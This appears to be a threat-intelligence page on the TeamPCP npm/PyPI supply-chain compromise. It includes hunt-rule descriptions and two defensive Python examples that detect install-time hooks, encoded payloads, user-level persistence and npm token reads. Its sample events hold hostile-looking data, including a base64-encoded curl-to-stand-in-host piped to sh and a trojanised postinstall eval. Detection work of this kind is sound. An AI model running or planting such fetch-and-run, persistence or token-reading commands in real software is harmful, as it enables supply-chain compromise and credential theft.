
Handala Threat Group
An Iranian aligned threat group conducting destructive and espionage focused cyber operations against organizations in Israel and Western countries.

The TeamPCP supply chain compromise has recently emerged as a highly impactful campaign targeting widely used open-source ecosystems, specifically abusing trust in package repositories such as npm and PyPI. This activity has been linked to compromises involving popular developer tooling and libraries, including Trivy, LiteLLM, and Checkmarx KICS, where malicious code was introduced into legitimate packages and distributed downstream to unsuspecting users. Researchers observed that TeamPCP leveraged these trusted packages to execute malicious payloads during installation or at runtime, effectively turning legitimate software into a delivery mechanism for credential theft and environment compromise. It is worth noting that the compromise of LiteLLM on PyPI and of Trivy-related npm packages significantly increased the potential blast radius because of their widespread adoption across cloud-native, DevOps, and AI-driven environments.
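To make the install-time execution path concrete, here is an added example (not code from TeamPCP, from the affected projects, or from the HUNTER platform) that audits a node_modules tree for packages declaring npm lifecycle scripts, the hook a trojanised package uses to run code on npm install. The sample packages, their names and their script bodies are constructed for the demo, and the "suspicious" patterns are assumed heuristics, not a vetted signature set.

```python
"""Added example, not part of this page or of the HUNTER platform: audit an
installed node_modules tree for packages that run code at install time via
npm lifecycle scripts (preinstall/install/postinstall/prepare). The sample
tree below is constructed inline; package names and scripts are fictitious."""
import json
import os
import re
import tempfile

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Assumed heuristics: things that rarely belong in a legitimate install script.
SUSPICIOUS = re.compile(r"curl |wget |node -e|eval\(|base64|\|\s*(sh|bash)\b")


def audit_node_modules(root):
    """Return {package_name: {"hooks": {...}, "suspicious": bool}} for every
    package.json under root that declares at least one lifecycle script."""
    findings = {}
    for dirpath, _dirs, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as f:
            try:
                pkg = json.load(f)
            except json.JSONDecodeError:
                continue  # not a real manifest; skip rather than crash the audit
        hooks = {h: s for h, s in pkg.get("scripts", {}).items() if h in LIFECYCLE}
        if hooks:
            findings[pkg.get("name", dirpath)] = {
                "hooks": hooks,
                "suspicious": any(SUSPICIOUS.search(s) for s in hooks.values()),
            }
    return findings


def build_sample_tree():
    """Construct a throwaway node_modules with a package that has no hooks, a
    legitimate native-build package, and a trojanised one (all fictitious)."""
    root = tempfile.mkdtemp()
    samples = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                         "scripts": {"test": "jest"}},
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "trojanised-lib": {"name": "trojanised-lib", "version": "4.4.1",
                           "scripts": {"postinstall": "node -e \"eval(Buffer.from("
                                       "'Y29uc29sZS5sb2coImhpIik=','base64').toString())\""}},
    }
    for name, pkg in samples.items():
        d = os.path.join(root, "node_modules", name)
        os.makedirs(d)
        with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as f:
            json.dump(pkg, f)
    return root


if __name__ == "__main__":
    for name, info in audit_node_modules(build_sample_tree()).items():
        flag = "SUSPICIOUS" if info["suspicious"] else "ok"
        print(f"{name}: {info['hooks']} [{flag}]")
```

Running it reports the two packages that declare hooks and flags only the constructed trojanised one; native-addon's node-gyp rebuild is the kind of legitimate hook that makes a blanket "no install scripts" rule noisy, which is why the audit records every hook and flags separately. As a hard control, npm install --ignore-scripts (or npm config set ignore-scripts true) skips these hooks entirely. PyPI has no equivalent field to inspect: an sdist's setup.py runs arbitrary code at build time, so the same audit there means reading the build script rather than a JSON key.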
Captures the execution of high-entropy, encoded payloads (e.g., Base64) within Python command lines to identify fileless malware, obfuscated scripts, and evasion techniques like homoglyph bypasses.
This hunt aims to surface cases where a node process invokes systemctl --user, which can indicate the creation or management of user-level systemd services for persistence. Attackers have abused this technique in supply chain attacks, such as CanisterWorm, to install backdoors that automatically restart and blend in with legitimate services by using trusted-sounding names like pgmon.
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
This hunt package identifies retrieval of the npm registry authentication token using "npm config get", which may indicate credential access or token harvesting activity.
This Threat Hunt package identifies suspicious Python executions originating from non-standard directories, such as hidden or unconventional locations, which can signal a malware infection.
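The five hunt descriptions above each reduce to a rule over process-creation telemetry. The following is an added example (not HUNTER platform content) that implements toy versions of all five and runs them over constructed events: a python -c with an encoded payload, node spawning systemctl --user, chmod granting execute rights, npm config get of an _authToken key, and python launched from a hidden directory, plus benign controls for each. The event schema (id, user, parent, exe, cmdline), the entropy threshold, the temp-directory prefixes and the virtualenv allowlist are all assumptions made for the demo.

```python
"""Added example, not HUNTER platform content: toy versions of the five hunt
packages listed above, run over constructed process-creation events. The
event schema (id, user, parent, exe, cmdline) is an assumed generic one, not
any vendor's log format; thresholds and allowlists are assumptions too."""
import base64
import binascii
import math
import os
import re
from collections import Counter


def shannon_entropy(s):
    """Bits per character: ~4.1 for English prose, up to 6.0 for random base64."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def _base(path):
    return os.path.basename(path)


def is_python(exe):
    return re.fullmatch(r"python[0-9.]*", _base(exe)) is not None


B64_RUN = re.compile(r"[A-Za-z0-9+/=]{40,}")


def encoded_python_payload(ev):
    """Hunt 1: python -c carrying a long, decodable, high-entropy base64 run."""
    argv = ev["cmdline"].split()
    if not is_python(ev["exe"]) or "-c" not in argv:
        return False
    for tok in B64_RUN.findall(ev["cmdline"]):
        try:
            base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue  # base64-looking but not decodable (paths, hashes, bad padding)
        if shannon_entropy(tok) >= 4.0:  # assumed threshold
            return True
    return False


def node_systemctl_user(ev):
    """Hunt 2: a node process spawning `systemctl --user ...` (user-level persistence)."""
    return (_base(ev["parent"]) == "node" and _base(ev["exe"]) == "systemctl"
            and "--user" in ev["cmdline"].split())


def chmod_grants_exec(ev):
    """Hunt 3: chmod whose mode adds an execute bit, octal (755) or symbolic (+x, a+rx)."""
    if _base(ev["exe"]) != "chmod":
        return False
    args = [a for a in ev["cmdline"].split()[1:] if not a.startswith("-")]
    if not args:
        return False
    mode = args[0]
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return int(mode, 8) & 0o111 != 0
    for clause in mode.split(","):
        m = re.fullmatch(r"[ugoa]*([+=-])([rwxXst]*)", clause)
        if m and m.group(1) in "+=" and ("x" in m.group(2) or "X" in m.group(2)):
            return True
    return False


def npm_token_read(ev):
    """Hunt 4: `npm config get` of an _authToken key (registry credential read)."""
    argv = ev["cmdline"].split()
    return (_base(ev["exe"]) == "npm" and argv[1:3] == ["config", "get"]
            and any("_authtoken" in a.lower() for a in argv[3:]))


TEMP_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed
VENV_DIRS = {".venv", ".virtualenvs", ".pyenv"}  # assumed allowlist of benign hidden dirs


def python_nonstandard_path(ev):
    """Hunt 5: a python binary run from a temp directory or a hidden directory."""
    exe = ev["exe"]
    if not is_python(exe):
        return False
    if exe.startswith(TEMP_PREFIXES):
        return True
    return any(p.startswith(".") and p not in VENV_DIRS for p in exe.split("/")[:-1])


HUNTS = {
    "encoded_python_payload": encoded_python_payload,
    "node_systemctl_user": node_systemctl_user,
    "chmod_grants_exec": chmod_grants_exec,
    "npm_token_read": npm_token_read,
    "python_nonstandard_path": python_nonstandard_path,
}


def run_hunts(events):
    """Map each hunt name to the ids of the events it fires on."""
    hits = {}
    for ev in events:
        for name, rule in HUNTS.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev["id"])
    return hits


def event(id, exe, cmdline, parent="/bin/sh", user="dev"):
    return {"id": id, "user": user, "parent": parent, "exe": exe, "cmdline": cmdline}


# Constructed sample events: e1-e5 should each fire exactly one hunt, e6-e9 are benign controls.
PAYLOAD = base64.b64encode(b"import os;os.system('curl http://198.51.100.7/s|sh')").decode()
EVENTS = [
    event("e1", "/usr/bin/python3",
          f"python3 -c \"import base64;exec(base64.b64decode('{PAYLOAD}'))\""),
    event("e2", "/usr/bin/systemctl", "systemctl --user enable --now pgmon.service",
          parent="/usr/bin/node"),
    event("e3", "/bin/chmod", "chmod +x /tmp/.cache/update.sh"),
    event("e4", "/usr/bin/npm", "npm config get //registry.npmjs.org/:_authToken"),
    event("e5", "/tmp/.cache/python3", "/tmp/.cache/python3 stage2.py"),
    event("e6", "/usr/bin/python3", "python3 manage.py runserver"),
    event("e7", "/bin/chmod", "chmod 644 README.md"),
    event("e8", "/usr/bin/npm", "npm config get registry"),
    event("e9", "/home/dev/.venv/bin/python", "python -m pytest"),
]

if __name__ == "__main__":
    for name, ids in run_hunts(EVENTS).items():
        print(f"{name}: {ids}")
```

Two design points carry over to a real SIEM or EDR query. Hunt 1 validates that a token actually decodes before scoring its entropy, which is what keeps long paths and hashes from tripping the rule; and hunt 5 needs an allowlist of hidden directories that legitimately hold interpreters (virtualenvs, pyenv), otherwise it fires on every developer workstation. The chmod rule deliberately evaluates the mode rather than matching the string "+x", so octal modes and comma-separated clauses such as a+rx,g-w are caught as well.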


CrazyHunter is a ransomware campaign targeting healthcare that weakens endpoint defenses and escalates privileges before encrypting systems at scale.

DevMan Ransomware is a newly emerging ransomware operation observed in 2025 that has been assessed as a derivative of the DragonForce ransomware family.